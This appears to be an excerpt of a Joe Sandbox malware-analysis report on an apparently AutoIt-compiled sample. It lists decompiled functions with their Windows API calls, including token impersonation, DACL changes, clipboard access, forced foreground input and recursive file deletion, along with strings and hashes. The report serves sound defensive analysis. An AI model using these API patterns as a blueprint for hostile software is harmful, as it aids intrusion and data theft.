TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007F9D82

Part of subcall function 00779944: GetWindowLongW.USER32(?,000000EB), ref: 00779952

GetWindowLongW.USER32(?,000000F0), ref: 007F9E05

Strings

@GUI_DRAGID, xrefs: 007F997D
@U=u, xrefs: 007F965B, 007F96C9, 007F96F2, 007F97AE, 007F97E9, 007F9810, 007F9918, 007F9A80, 007F9AAE, 007F9AEB, 007F9B1A, 007F9BFA, 007F9C2B, 007F9CDE, 007F9D01
F, xrefs: 007F9D07

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$@U=u$F
API String ID: 3429851547-1007936534
Opcode ID: 1649ec0827d850962ef4b71ffaa4d12ea21d496969d25b3fca6a93ab8955ad31
Instruction ID: bf528f62b2768c4e2032ecda70e1a6e35c824e39c12ffb4207f28bb8d2a2542f
Opcode Fuzzy Hash: 1649ec0827d850962ef4b71ffaa4d12ea21d496969d25b3fca6a93ab8955ad31
Instruction Fuzzy Hash: 27426B30208209EFDB25DF24C948BBABBE5FF88720F144A59F759C72A1D739A854CB51

Function 007F4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007F48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 007F4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 007F4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 007F494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 007F495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007F497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007F49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007F49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 007F4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007F4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007F4A7E
IsMenu.USER32(?), ref: 007F4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007F4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007F4B20
GetWindowLongW.USER32(?,000000F0), ref: 007F4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 007F4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 007F4C82
wsprintfW.USER32 ref: 007F4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007F4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 007F4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007F4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007F4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 007F4D5A

Strings

%d/%02d/%02d, xrefs: 007F4CA8
@U=u, xrefs: 007F48F3, 007F4908, 007F495C, 007F4A0F, 007F4A56, 007F4A7E, 007F4BE3, 007F4C82, 007F4CC9, 007F4D13, 007F4D33, 007F4E15, 007F4E4E, 007F4EA5, 007F4F10

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$@U=u
API String ID: 4054740463-2764005415
Opcode ID: 5b68ec3f5c76299d54d9d91f6c0407688a45efd9613bf59a7a7df87515be00d4
Instruction ID: 496c8a5dbed8b44edc8fca6204aed1c042234b1c2a88a9181510b44d11d43ed4
Opcode Fuzzy Hash: 5b68ec3f5c76299d54d9d91f6c0407688a45efd9613bf59a7a7df87515be00d4
Instruction Fuzzy Hash: 8712DF71600218ABEB258F28CD49FBF7BF8BF45710F148159FA1ADA2A1DB789941CB50

Function 0077F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0077F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007BF474
IsIconic.USER32(00000000), ref: 007BF47D
ShowWindow.USER32(00000000,00000009), ref: 007BF48A
SetForegroundWindow.USER32(00000000), ref: 007BF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007BF4AA
GetCurrentThreadId.KERNEL32 ref: 007BF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007BF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 007BF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 007BF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 007BF4DE
SetForegroundWindow.USER32(00000000), ref: 007BF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 007BF4F6
keybd_event.USER32(00000012,00000000), ref: 007BF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 007BF50B
keybd_event.USER32(00000012,00000000), ref: 007BF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 007BF519
keybd_event.USER32(00000012,00000000), ref: 007BF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 007BF528
keybd_event.USER32(00000012,00000000), ref: 007BF52D
SetForegroundWindow.USER32(00000000), ref: 007BF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 007BF557

Strings

Shell_TrayWnd, xrefs: 007BF46F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d0fb0e20be0381ee02797c43262bab1f6dd6e9a32151d931540dabdc4cccd440
Instruction ID: 11f8036e770d709ff84a2f1667caba35327d8c5c01c2c57fc96cd1c3d660089e
Opcode Fuzzy Hash: d0fb0e20be0381ee02797c43262bab1f6dd6e9a32151d931540dabdc4cccd440
Instruction Fuzzy Hash: EF315071A4021CBBEB216BB55D4AFBF7F6CEF44B50F204065FA00E61D1C6B85D10EA65

Function 007C1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 007C16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C170D
Part of subcall function 007C16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C173A
Part of subcall function 007C16C3: GetLastError.KERNEL32 ref: 007C174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 007C1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007C12A8
CloseHandle.KERNEL32(?), ref: 007C12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C12D1
GetProcessWindowStation.USER32 ref: 007C12EA
SetProcessWindowStation.USER32(00000000), ref: 007C12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C1310

Part of subcall function 007C10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C11FC), ref: 007C10D4
Part of subcall function 007C10BF: CloseHandle.KERNEL32(?,?,007C11FC), ref: 007C10E9

Strings

winsta0, xrefs: 007C12CC
, xrefs: 007C125A
default, xrefs: 007C130B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: d1f64ffeb06d7c0cd06551a25ae6442563df2d1c2a70a8a6c1563127e08c35a8
Instruction ID: a31855028193198fc6e7a7ea908301c1c3117dc6d94b64c53ff69e5778c630fb
Opcode Fuzzy Hash: d1f64ffeb06d7c0cd06551a25ae6442563df2d1c2a70a8a6c1563127e08c35a8
Instruction Fuzzy Hash: 5681AA71900248AFDF269FA4DD49FEE7BB9EF05700F14816DF910E61A2D7388A44CB64

Function 007C0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C1114
Part of subcall function 007C10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1120
Part of subcall function 007C10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C112F
Part of subcall function 007C10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1136
Part of subcall function 007C10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C0C00
GetLengthSid.ADVAPI32(?), ref: 007C0C17
GetAce.ADVAPI32(?,00000000,?), ref: 007C0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C0C6D
GetLengthSid.ADVAPI32(?), ref: 007C0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 007C0C8C
HeapAlloc.KERNEL32(00000000), ref: 007C0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C0CB4
CopySid.ADVAPI32(00000000), ref: 007C0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0D45
HeapFree.KERNEL32(00000000), ref: 007C0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0D55
HeapFree.KERNEL32(00000000), ref: 007C0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C0D65
HeapFree.KERNEL32(00000000), ref: 007C0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 007C0D78
HeapFree.KERNEL32(00000000), ref: 007C0D7F

Part of subcall function 007C1193: GetProcessHeap.KERNEL32(00000008,007C0BB1,?,00000000,?,007C0BB1,?), ref: 007C11A1
Part of subcall function 007C1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007C0BB1,?), ref: 007C11A8
Part of subcall function 007C1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007C0BB1,?), ref: 007C11B7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2cc0eded6298618e287ddf9a403b89b1d6fdea97cbf6009ef5652a417686a35b
Instruction ID: 84ab5828c77bec85196b80f0ca3c9f0084715c3002a4527ef7d590c0dd72e1af
Opcode Fuzzy Hash: 2cc0eded6298618e287ddf9a403b89b1d6fdea97cbf6009ef5652a417686a35b
Instruction Fuzzy Hash: 93715DB1A0020EEBDF11DFA4DD45FEEBBB8BF04700F048519E915A6191D779A905CBE0

Function 007DEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(007FCC08), ref: 007DEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 007DEB37
GetClipboardData.USER32(0000000D), ref: 007DEB43
CloseClipboard.USER32 ref: 007DEB4F
GlobalLock.KERNEL32(00000000), ref: 007DEB87
CloseClipboard.USER32 ref: 007DEB91
GlobalUnlock.KERNEL32(00000000), ref: 007DEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 007DEBC9
GetClipboardData.USER32(00000001), ref: 007DEBD1
GlobalLock.KERNEL32(00000000), ref: 007DEBE2
GlobalUnlock.KERNEL32(00000000), ref: 007DEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 007DEC38
GetClipboardData.USER32(0000000F), ref: 007DEC44
GlobalLock.KERNEL32(00000000), ref: 007DEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 007DEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007DEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007DECD2
GlobalUnlock.KERNEL32(00000000), ref: 007DECF3
CountClipboardFormats.USER32 ref: 007DED14
CloseClipboard.USER32 ref: 007DED59

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 29a08c33f3145a0cb952b0ae750bd72348545ec46d4e58d2a593a8ce2df067e8
Instruction ID: cb2c64f9e6c6dcf4fa400838ce251d79d638a652298948411d0ca6af073b852b
Opcode Fuzzy Hash: 29a08c33f3145a0cb952b0ae750bd72348545ec46d4e58d2a593a8ce2df067e8
Instruction Fuzzy Hash: 3361AE742042069FD302EF24D988F3AB7B4AF84704F14855EF8569B3A1CB39E909CB62

Function 007D698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007D69BE
FindClose.KERNEL32(00000000), ref: 007D6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007D6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007D6A75

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 007D6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 007D6ADF

Strings

%4d, xrefs: 007D6BB1
%4d%02d%02d%02d%02d%02d, xrefs: 007D6B6A
%02d, xrefs: 007D6C00, 007D6C0A, 007D6C5A, 007D6CAA, 007D6CFA, 007D6D4A
%03d, xrefs: 007D6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 007D6B32

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: be22056a5ae8095292ec8dab7f5c46fe4e923cd0798b2bd1a6f447dc8d4efe03
Instruction ID: c7fb7c4eba1f8ce5d50948b9259e9c0d7570da75d21f1b46b48097414ad02d7a
Opcode Fuzzy Hash: be22056a5ae8095292ec8dab7f5c46fe4e923cd0798b2bd1a6f447dc8d4efe03
Instruction Fuzzy Hash: B5D14072508340EFC714DBA4C985EABB7ECBF88704F44491DF986D6251EB78DA44C762

Function 007D9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 007D9663
GetFileAttributesW.KERNEL32(?), ref: 007D96A1
SetFileAttributesW.KERNEL32(?,?), ref: 007D96BB
FindNextFileW.KERNEL32(00000000,?), ref: 007D96D3
FindClose.KERNEL32(00000000), ref: 007D96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 007D96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 007D974A
SetCurrentDirectoryW.KERNEL32(00826B7C), ref: 007D9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D9772
FindClose.KERNEL32(00000000), ref: 007D977F
FindClose.KERNEL32(00000000), ref: 007D978F

Strings

*.*, xrefs: 007D96F5

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 785a6cbc9578ffd7ca46fd9805eb0280d667faf5cefb15f8a0274ccbdf502658
Instruction ID: 82b5fce6038461fcba1ff1e1fe6d91e94a9dc92d37b70aad810a8aef3741126b
Opcode Fuzzy Hash: 785a6cbc9578ffd7ca46fd9805eb0280d667faf5cefb15f8a0274ccbdf502658
Instruction Fuzzy Hash: 5E31A27254021DAADF15AFB4ED49AEE77BCEF09331F108156EA15E22A0EB38D944CB14

Function 007D979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 007D97BE
FindNextFileW.KERNEL32(00000000,?), ref: 007D9819
FindClose.KERNEL32(00000000), ref: 007D9824
FindFirstFileW.KERNEL32(*.*,?), ref: 007D9840
SetCurrentDirectoryW.KERNEL32(?), ref: 007D9890
SetCurrentDirectoryW.KERNEL32(00826B7C), ref: 007D98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007D98B8
FindClose.KERNEL32(00000000), ref: 007D98C5
FindClose.KERNEL32(00000000), ref: 007D98D5

Part of subcall function 007CDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007CDB00

Strings

*.*, xrefs: 007D983B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: ee5bbc89a271a075fe9d63a9db7e07af7be3c1b677b6612a83afc71429177f51
Instruction ID: 5d161996b524efc65ee24951d1f1686f62ae2334d362bdc8853cbfa56b143501
Opcode Fuzzy Hash: ee5bbc89a271a075fe9d63a9db7e07af7be3c1b677b6612a83afc71429177f51
Instruction Fuzzy Hash: 5931953254061DAADF15AFB4EC48AEE77BCEF06720F148156E514E22A0DB38D984DB64

Function 007D8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007D8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 007D8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007D8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D8310
SetCurrentDirectoryW.KERNEL32(?), ref: 007D8324
SetCurrentDirectoryW.KERNEL32(?), ref: 007D8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007D838C
SetCurrentDirectoryW.KERNEL32(?), ref: 007D8395

Strings

*.*, xrefs: 007D839B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 2bffbe92140abec0181637778027ca2d274a4a0895c48493929901d360b6c86b
Instruction ID: 98b6a7aba61db5c40d962389ebacc2cab68448069a943d22bff719750977967e
Opcode Fuzzy Hash: 2bffbe92140abec0181637778027ca2d274a4a0895c48493929901d360b6c86b
Instruction Fuzzy Hash: A56138725043459FCB10EF64C8449AEB3F8FF89324F04891EF99A97251EB39E945CB92

Function 007CD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00763AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00763A97,?,?,00762E7F,?,?,?,00000000), ref: 00763AC2

Part of subcall function 007CE199: GetFileAttributesW.KERNEL32(?,007CCF95), ref: 007CE19A

FindFirstFileW.KERNEL32(?,?), ref: 007CD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 007CD1DD
MoveFileW.KERNEL32(?,?), ref: 007CD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 007CD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 007CD237

Part of subcall function 007CD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,007CD21C,?,?), ref: 007CD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 007CD253
FindClose.KERNEL32(00000000), ref: 007CD264

Strings

\*.*, xrefs: 007CD0CD, 007CD0D6, 007CD0EB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 6c63fe199dc5ad024a016258263c7370a4b1e9a6f1d5cfe899de90e2222d41ec
Instruction ID: fdfe536cdbb1e1331aec0cf5bff14ddda66d5f4ce2831fd03dcf4e8aa8b9e807
Opcode Fuzzy Hash: 6c63fe199dc5ad024a016258263c7370a4b1e9a6f1d5cfe899de90e2222d41ec
Instruction Fuzzy Hash: E5611A3180110DEBDF15EBA0DA56EEDB7B9AF55300F244169E80277191EB38AF09DB61

Function 007DED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007DED91
EmptyClipboard.USER32 ref: 007DED97
GlobalAlloc.KERNEL32(00000002,?), ref: 007DEDAC
CloseClipboard.USER32 ref: 007DEEA3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 668a052e6810ce4365bfd6640c0e3efc0b9aacf529f90f3aad997906fc8c45a3
Instruction ID: c18b894f88c45d70d08d14a516a511a526a0c58538f808f526ad01f6aaf04812
Opcode Fuzzy Hash: 668a052e6810ce4365bfd6640c0e3efc0b9aacf529f90f3aad997906fc8c45a3
Instruction Fuzzy Hash: 2E417935204611AFE722EF15D988B29BBA1EF44318F14C09AE85A8F762C779EC41CB90

